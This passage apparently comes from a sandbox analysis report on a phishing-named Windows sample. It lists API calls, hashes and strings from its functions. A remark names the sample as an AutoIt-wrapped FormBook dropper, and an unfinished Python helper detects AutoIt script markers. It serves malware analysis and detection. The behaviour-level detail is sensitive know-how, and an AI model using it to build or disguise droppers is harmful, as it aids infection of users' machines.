                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                        • Instruction ID: 4fa8abe49598e2a912a90b9553488f0ca1caae9a6a04fea2adc8486568871b5c
                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                        • Instruction Fuzzy Hash: 7012BD24A24658C6EB24DF64D8507DEB232EF68300F1094ED910DEB7A5E77A4F81CF5A
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: f9de2584038e82857e55239d0d003e15f54d771caa855f22807268af4f72ed59
                        • Instruction ID: 2164f019fa74052295d863acd8a1ab7259f559ea264607a4698b63fac57e90ec
                        • Opcode Fuzzy Hash: f9de2584038e82857e55239d0d003e15f54d771caa855f22807268af4f72ed59
                        • Instruction Fuzzy Hash: E041C37A210602DFC715DF19D491AA2F7F0FF883A0714C42ED99A87761DBB0E861DB50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 5c3b0bb0035263e240438783ec4503e679530e6c78a21396fbb9bbb38a4a68a3
                        • Instruction ID: 18a3bb8c2636d9cb575a28210fb66da484e4185b26d733a71ea3a9139a3bea3b
                        • Opcode Fuzzy Hash: 5c3b0bb0035263e240438783ec4503e679530e6c78a21396fbb9bbb38a4a68a3
                        • Instruction Fuzzy Hash: F2415870514651CFEB25CF18C484F1ABBE1BF49308F19869CE99A4B362C372E895CF52
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: 060ef39270eae4f330e37bb9a999863f574ba651c1b05bae9951fa4e80cc6389
                        • Instruction ID: b7935b5e814c601d9df563574f5a64bad30b2322c5fdc3df8bde13e493237af5
                        • Opcode Fuzzy Hash: 060ef39270eae4f330e37bb9a999863f574ba651c1b05bae9951fa4e80cc6389
                        • Instruction Fuzzy Hash: 99210871620A19FBCF164F11FC4276ABBB8EF15790F21C52DE486C50A0EBB095E0CB55
                        APIs
                          • Part of subcall function 002B3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 002B3F90
                          • Part of subcall function 002D4129: __wfsopen.LIBCMT ref: 002D4134
                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002B34E2,?,00000001), ref: 002B3FCD
                          • Part of subcall function 002B3E78: FreeLibrary.KERNEL32(00000000), ref: 002B3EAB
                          • Part of subcall function 002B4010: _memmove.LIBCMT ref: 002B405A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Library$Free$Load__wfsopen_memmove
                        • String ID:
                        • API String ID: 1396898556-0
                        • Opcode ID: 8d3b1528f36cb1075ef148200f49ab1dc08dda10f56b493cd65203f3bd50a12f
                        • Instruction ID: 101dbce350a11b867e5b1084dea174e82658fb4a108560e94ce5076cda4d3cc1
                        • Opcode Fuzzy Hash: 8d3b1528f36cb1075ef148200f49ab1dc08dda10f56b493cd65203f3bd50a12f
                        • Instruction Fuzzy Hash: A311E731630219BACB15FB64DC53FDD76A59F50780F108829F545E6182DBB0EF649F50
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 08f2e4831abc79a0e1a31dee98e28e61dd066d33849e42c86990440bc81e4d8e
                        • Instruction ID: a6f4799b09c6cf594b87960df5e333dd690efdb0bc1cb2319176558bc74feb30
                        • Opcode Fuzzy Hash: 08f2e4831abc79a0e1a31dee98e28e61dd066d33849e42c86990440bc81e4d8e
                        • Instruction Fuzzy Hash: 3F214670118601CFD724DF25C484F1ABBE1BF89304F154A6CE99A4B222C331E8A5CF52
                        APIs
                        • ___lock_fhandle.LIBCMT ref: 002DBD73
                          • Part of subcall function 002D886A: __getptd_noexit.LIBCMT ref: 002D886A
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getptd_noexit$___lock_fhandle
                        • String ID:
                        • API String ID: 1144279405-0
                        • Opcode ID: e5bf5d6816d7e98889b81d904831cb121771ef6ade3b83ad2fa7a0939099b159
                        • Instruction ID: 36ee6962de8b4789fc87220c98765bf601ccd35782560f3e78096e1a6fb0afd4
                        • Opcode Fuzzy Hash: e5bf5d6816d7e98889b81d904831cb121771ef6ade3b83ad2fa7a0939099b159
                        • Instruction Fuzzy Hash: E511CE32834658DFD7137F64C8563597A626F42331F960242E5644F3E2DBF88D609F61
                        APIs
                        • __lock_file.LIBCMT ref: 002D377D
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getptd_noexit__lock_file
                        • String ID:
                        • API String ID: 2597487223-0
                        • Opcode ID: 159b3439ffda6790819efbedc90ccdb3c6232d21cc6ba74ad9a735704e45ba17
                        • Instruction ID: e10e539877118a854446a1123daf27500e2fe5c46e8ce02dfa6b88debb36f25d
                        • Opcode Fuzzy Hash: 159b3439ffda6790819efbedc90ccdb3c6232d21cc6ba74ad9a735704e45ba17
                        • Instruction Fuzzy Hash: 1DF062B1520616AAEF21EF74CC067DEB6A0AF04310F548516F4149A391E7B98F70DF92
                        APIs
                        • FreeLibrary.KERNEL32(?,?,?,?,?,002B34E2,?,00000001), ref: 002B3E6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FreeLibrary
                        • String ID:
                        • API String ID: 3664257935-0
                        • Opcode ID: 9eba7a00996c2024502e0e651228b7533cf7d1ac383e488372579b1f32899e7d
                        • Instruction ID: f25365556d1cdb4d14a44b04d9ced1617ca388f4622d4df66faaf958ac612d1d
                        • Opcode Fuzzy Hash: 9eba7a00996c2024502e0e651228b7533cf7d1ac383e488372579b1f32899e7d
                        • Instruction Fuzzy Hash: C9F0A972020302CFCB34DF24D490892BBE0AF047653248A3FE5C682622C731D968CF00
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction ID: dcfe8c6549463ceb0cf7df8cd9590ccf6bbff4d338f31424707c95f4c79f99ff
                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                        • Instruction Fuzzy Hash: A7B0927244030C77CE012A82EC02A493B19AB50664F008021FB0C18261A673EAB09A89
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction ID: 656b939e4bbc86a2a1daa5d483d10466af30c90c5dda3009491c250845b76d8d
                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                        • Instruction Fuzzy Hash: AA31D671A10106ABCB98DF58D680F69FBA6FB49300B2487A9E44ACB355D731EDD1CBC0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 14f83a35c9c3b3c73196fa06fec74561ef5e7d685a2a8002a6749a6fcd8aa3fc
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 9BE0E67494020EDFDB00EFB8D54969E7FB4EF04301F1005A5FD01D6280D6309D508A72
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0031F64E
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031F6AD
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031F6EA
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0031F711
                        • SendMessageW.USER32 ref: 0031F737
                        • _wcsncpy.LIBCMT ref: 0031F7A3
                        • GetKeyState.USER32(00000011), ref: 0031F7C4
                        • GetKeyState.USER32(00000009), ref: 0031F7D1
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0031F7E7
                        • GetKeyState.USER32(00000010), ref: 0031F7F1
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0031F820
                        • SendMessageW.USER32 ref: 0031F843
                        • SendMessageW.USER32(?,00001030,?,0031DE69), ref: 0031F940
                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0031F956
                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0031F967
                        • SetCapture.USER32(?), ref: 0031F970
                        • ClientToScreen.USER32(?,?), ref: 0031F9D4
                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0031F9E0
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0031F9FA
                        • ReleaseCapture.USER32 ref: 0031FA05
                        • GetCursorPos.USER32(?), ref: 0031FA3A
                        • ScreenToClient.USER32(?,?), ref: 0031FA47
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0031FAA9
                        • SendMessageW.USER32 ref: 0031FAD3
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0031FB12
                        • SendMessageW.USER32 ref: 0031FB3D
                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0031FB55
                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0031FB60
                        • GetCursorPos.USER32(?), ref: 0031FB81
                        • ScreenToClient.USER32(?,?), ref: 0031FB8E
                        • GetParent.USER32(?), ref: 0031FBAA
                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0031FC10
                        • SendMessageW.USER32 ref: 0031FC40
                        • ClientToScreen.USER32(?,?), ref: 0031FC96
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0031FCC2
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0031FCEA
                        • SendMessageW.USER32 ref: 0031FD0D
                        • ClientToScreen.USER32(?,?), ref: 0031FD57
                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0031FD87
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031FE1C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 2516578528-4164748364
                        • Opcode ID: ef175da965ccf22cc66078807170e58dffd559d187c79d0c6ae1c83a3b8391f2
                        • Instruction ID: 83f721e470a26535e76e75830dd8d1820f64c669e390166e8e0f15e6f1ef340b
                        • Opcode Fuzzy Hash: ef175da965ccf22cc66078807170e58dffd559d187c79d0c6ae1c83a3b8391f2
                        • Instruction Fuzzy Hash: A232CE71204601AFD72ADF68C884EAABBE9FF4C354F140629F6A9872B1D770DC94CB51
                        APIs
                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0031AFDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: %d/%02d/%02d
                        • API String ID: 3850602802-328681919
                        • Opcode ID: 2e9afcf85a46b0798c795cbc596122019d29f80f71e7cecc9f2d54cc57b253ce
                        • Instruction ID: a9cd6a4e4885c86be029e2ddf5a061083849c8362656903537a87444dead1f99
                        • Opcode Fuzzy Hash: 2e9afcf85a46b0798c795cbc596122019d29f80f71e7cecc9f2d54cc57b253ce
                        • Instruction Fuzzy Hash: FA12E2B1501A04AFEB2A8F64DC89FEE7BB8EF49311F114219F519EB2D0DB708981CB11
                        APIs
                        • GetForegroundWindow.USER32(00000000,00000000), ref: 002CF796
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00324388
                        • IsIconic.USER32(000000FF), ref: 00324391
                        • ShowWindow.USER32(000000FF,00000009), ref: 0032439E
                        • SetForegroundWindow.USER32(000000FF), ref: 003243A8
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003243BE
                        • GetCurrentThreadId.KERNEL32 ref: 003243C5
                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 003243D1
                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003243E2
                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 003243EA
                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 003243F2
                        • SetForegroundWindow.USER32(000000FF), ref: 003243F5
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032440A
                        • keybd_event.USER32(00000012,00000000), ref: 00324415
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032441F
                        • keybd_event.USER32(00000012,00000000), ref: 00324424
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032442D
                        • keybd_event.USER32(00000012,00000000), ref: 00324432
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0032443C
                        • keybd_event.USER32(00000012,00000000), ref: 00324441
                        • SetForegroundWindow.USER32(000000FF), ref: 00324444
                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 0032446B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 4125248594-2988720461
                        • Opcode ID: e1c885d024f8d10bd9c3718c368e4290114ae2ad3cb99d4cb8469fffefac8812
                        • Instruction ID: 63069e4647dbe97a191b328d718ba19ba6e336ad0750e0a8be210370cf1f4a9b
                        • Opcode Fuzzy Hash: e1c885d024f8d10bd9c3718c368e4290114ae2ad3cb99d4cb8469fffefac8812
                        • Instruction Fuzzy Hash: B7316771A40318BFFB226B71AC8AF7F7E6CEB44B54F114015FA05EA1D1C6B05D51AEA0
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,003722E8,?,00000000,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?), ref: 002BBE8B
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?,00000002), ref: 002BBEA7
                        • __wsplitpath.LIBCMT ref: 002BBF19
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcscpy.LIBCMT ref: 002BBF31
                        • _wcscat.LIBCMT ref: 002BBF46
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 002BBF56
                        • _wcscpy.LIBCMT ref: 002BC03E
                        • _wcscpy.LIBCMT ref: 002BC1ED
                        • SetCurrentDirectoryW.KERNEL32 ref: 002BC250
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                          • Part of subcall function 002BC320: _memmove.LIBCMT ref: 002BC419
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_$"7
                        • API String ID: 2542276039-1404632439
                        • Opcode ID: 7568a8fb91b93b0e8ddfcd2cc6e3a4f5cf46b332968ef078a47e85110e67ea7c
                        • Instruction ID: ca99c4629d483be72a1c72012d1bd124bc290c754c4bb017f7867533d9dd21d7
                        • Opcode Fuzzy Hash: 7568a8fb91b93b0e8ddfcd2cc6e3a4f5cf46b332968ef078a47e85110e67ea7c
                        • Instruction Fuzzy Hash: 0342B2715283459FD711EF60D881BEBB7E8AF84340F10482EF58597252DB71EA68CF92
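The string list of this function (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", "#include depth exceeded ...", "Bad directive syntax error") is the AutoIt3 script loader, so the submitted PE is a compiled AutoIt script; that is a common delivery wrapper for the FormBook payload this report detects. The Python below is an added triage helper, not Joe Sandbox or AutoIt code. It scans a buffer for the markers named above. That a compiled script stores "AU3!" and "EA06" back-to-back as `AU3!EA06` is taken from the AutoIt compiled-script header format, not from this report, and is marked as an assumption in the code; the buffer it scans is constructed inline.

```python
"""Flag a file that carries a compiled AutoIt v3 script.

Added triage example for this report; not Joe Sandbox or AutoIt code.
Markers: ">>>AUTOIT SCRIPT<<<", "AU3!" and "EA06" are in the string list of
the function block above. That a compiled script stores the last two
back-to-back as b"AU3!EA06" is taken from the AutoIt compiled-script header
format, not from this report (assumption). The scanned buffer is constructed.
"""
import re

MARKERS = {
    "au3_header": b"AU3!EA06",               # compiled-script header (assumed layout)
    "script_banner": b">>>AUTOIT SCRIPT<<<",  # runtime string seen in the report
}


def find_autoit_markers(data: bytes) -> dict:
    """Return {marker_name: [byte offsets]} for every marker present in data."""
    hits = {}
    for name, needle in MARKERS.items():
        offsets = [m.start() for m in re.finditer(re.escape(needle), data)]
        if offsets:
            hits[name] = offsets
    return hits


def is_pe(data: bytes) -> bool:
    """Minimal PE check: 'MZ' stub and 'PE\\0\\0' at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(data: bytes) -> str:
    """Coarse verdict: a PE with the AU3 header is a compiled AutoIt binary;
    the header alone is a bare script blob; the banner alone means only the
    AutoIt runtime strings are present (e.g. a memory dump of the runtime)."""
    hits = find_autoit_markers(data)
    if "au3_header" in hits:
        return "compiled-autoit" if is_pe(data) else "au3-script-blob"
    if "script_banner" in hits:
        return "autoit-runtime-strings-only"
    return "no-autoit-markers"


def build_sample() -> bytes:
    """Constructed test input: a minimal MZ/PE stub followed by an overlay that
    holds the runtime banner and then the compiled-script header."""
    stub = bytearray(b"MZ" + b"\x00" * 0x3A)      # 0x3C bytes of DOS header
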